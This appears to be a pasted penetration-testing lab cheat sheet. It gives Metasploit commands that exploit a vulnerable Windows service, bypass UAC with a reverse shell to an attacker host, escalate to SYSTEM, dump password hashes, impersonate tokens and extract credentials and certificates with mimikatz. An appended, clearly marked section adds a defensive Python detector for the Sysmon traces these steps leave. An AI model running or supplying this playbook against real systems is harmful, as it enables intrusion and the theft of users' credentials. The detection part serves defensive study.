joemccray
Sep 18th, 2019
Windows 10
----------
use exploit/windows/misc/vulnserv
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.195.143
set RPORT 9999
exploit


Windows 7
---------
use exploit/windows/misc/vulnserv
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.195.141
set RPORT 9999
exploit
background


use exploit/windows/local/ask
set SESSION 8
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.195.143
set LPORT 7799
exploit


-----------------------------------------------------------------------

A window will pop up and you need to click Yes in order to get your new meterpreter shell

meterpreter > getuid

meterpreter > ps (search for a process running as NT AUTHORITY\SYSTEM)

meterpreter > migrate 2800 (your process id WILL NOT be 2800, but make sure you use one that is running as NT AUTHORITY\SYSTEM)

meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run post/windows/gather/hashdump

meterpreter > run post/windows/gather/credentials/credential_collector
-----------------------------------------------------------------------


********************************** Steal Tokens **********************************

---------------------------Type This-----------------------------------
meterpreter > getsystem

meterpreter > use incognito

meterpreter > list_tokens -u

meterpreter > list_tokens -g

meterpreter > impersonate_token <-- choose who you want to impersonate, but be sure to use two backslashes in the name (ex: impersonate_token domain\\user)

meterpreter > getuid
-----------------------------------------------------------------------


************ Stealing credentials and certificates ************
- NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.

---------------------------Type This-----------------------------------
meterpreter > getsystem

meterpreter > load mimikatz

meterpreter > kerberos

meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"

meterpreter > msv <-- Your AD password

meterpreter > livessp <-- Your Windows 8 password

meterpreter > ssp <-- Your Outlook password

meterpreter > tspkg <-- Your AD password

meterpreter > wdigest <-- Your AD password

meterpreter > mimikatz_command -f crypto::listStores

meterpreter > mimikatz_command -f crypto::listCertificates

meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER

meterpreter > mimikatz_command -f crypto::patchcapi

meterpreter > search -d <directory> -f <file-pattern>
-----------------------------------------------------------------------
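Added detection example (not part of the original paste or of Metasploit): the `migrate` step and the `sekurlsa::logonPasswords` step above leave two well-known traces in Sysmon telemetry, EventID 8 (CreateRemoteThread from the injecting process) and EventID 10 (ProcessAccess against lsass.exe with memory-read rights). The sample events, paths and allowlists below are constructed for this example and must be tuned to a real environment.

```python
import json
import ntpath

PROCESS_VM_READ = 0x0010  # Windows access right needed to read another process's memory

# Assumed allowlists for this example; real environments need their own baselines.
LSASS_READERS_ALLOWED = {"csrss.exe", "wininit.exe", "services.exe", "lsass.exe"}
REMOTE_THREAD_ALLOWED = {"csrss.exe", "wininit.exe", "services.exe", "svchost.exe"}

# Constructed Sysmon-style events, one JSON object per line (EventID 8 =
# CreateRemoteThread, EventID 10 = ProcessAccess). Field names follow the
# Sysmon schema; every path, access mask and address here is made up.
SAMPLE_EVENTS = [
    r'{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"}',
    r'{"EventID": 10, "SourceImage": "C:\\Users\\lab\\vulnserver.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}',
    r'{"EventID": 8, "SourceImage": "C:\\Users\\lab\\vulnserver.exe", "TargetImage": "C:\\Windows\\System32\\spoolsv.exe", "StartAddress": "0x000001F3A4B20000"}',
    r'{"EventID": 8, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\explorer.exe", "StartAddress": "0x00007FF812340000"}',
]


def _basename(path):
    """Lower-cased file name of a Windows path, so allowlists match regardless of directory."""
    return ntpath.basename(path).lower()


def detect(lines):
    """Return one alert dict per event that matches a rule; other events are ignored."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        src = _basename(ev.get("SourceImage", ""))
        dst = _basename(ev.get("TargetImage", ""))
        if ev.get("EventID") == 10 and dst == "lsass.exe":
            # Credential dumping needs PROCESS_VM_READ on lsass; a bare query (0x1000) does not.
            granted = int(ev.get("GrantedAccess", "0"), 16)
            if granted & PROCESS_VM_READ and src not in LSASS_READERS_ALLOWED:
                alerts.append({"rule": "lsass-memory-read", "source": src,
                               "granted_access": hex(granted)})
        elif ev.get("EventID") == 8 and src not in REMOTE_THREAD_ALLOWED:
            # A user-land process starting a thread in another process is how migrate shows up.
            alerts.append({"rule": "remote-thread-injection", "source": src, "target": dst})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Running it on the constructed events yields two alerts, both attributed to the exploited service process; the csrss.exe events are filtered out by the allowlists.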